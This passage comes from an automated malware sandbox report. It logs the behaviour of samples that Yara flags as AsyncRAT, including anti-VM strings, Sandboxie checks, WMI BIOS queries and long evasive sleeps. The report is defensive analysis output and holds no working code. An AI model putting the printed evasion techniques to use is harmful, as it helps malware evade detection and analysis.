Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Yara detected AsyncRAT
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL@\^Q
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EXPLORER9SBIEDLL.DLL:SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE;VERSION<SERIALNUMBER>VMWARE|VIRTUAL|A M I|XEN?SELECT * FROM WIN32_COMPUTERSYSTEM@MANUFACTURERAMODELBMICROSOFT|VMWARE|VIRTUALCJOHNDANNAEXXXXXXXX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 3080000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 3250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 5250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 6500000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 7500000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 86B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 96B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6770000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 68F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 88F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 14F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 2F40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 60B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 70B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 8300000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 9300000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E40000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 70E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 1A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 37D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 1E00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 6970000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 7970000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 8B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 9B30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 5260000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 7030000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E50000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4251 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 768 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window / User API: threadDelayed 9995 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window / User API: foregroundWindowGot 922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window / User API: foregroundWindowGot 856 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3219 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2823 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 6176 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 3379 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe TID: 7324 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep count: 3219 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep count: 2823 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7836 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7892 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7892 Thread sleep time: -33204139332677172s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7900 Thread sleep count: 6176 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7900 Thread sleep count: 3379 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe TID: 7964 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 8104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe TID: 8164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Yara detected ProcessChecker
Source: Yara match File source: 4.0.Office Installer.exe.7ff6c80ea6da.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Gm602axA2d.exe.4ba1cfa.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Office Installer.exe.7ff6c80ea6da.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Office Installer.exe.7ff6c80ea6da.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.Office Installer.exe.7ff6c80ea6da.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.Office Installer.exe.7ff6c7e70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Office Installer.exe.7ff6c7e70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Gm602axA2d.exe PID: 7136, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Office Installer.exe PID: 7336, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Office Installer.exe, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
